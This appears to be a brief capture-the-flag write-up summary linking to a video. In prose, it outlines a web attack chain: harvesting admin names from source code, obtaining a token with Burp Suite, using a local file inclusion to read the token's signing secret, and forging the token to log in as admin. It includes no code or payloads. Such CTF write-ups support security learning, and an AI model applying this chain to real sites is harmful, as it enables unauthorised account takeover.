Tags: tokens curl jwt lfi 


We get good information from the source code which allows us to get the names of the admins. We then send a request using burpsuite and get a token. Then we find A LFI and get the secret for the token, and make the necessary modifications to it so that we can authenticate as admin. Then we get the flag!

Original writeup (https://youtu.be/tECywEsDpLQ).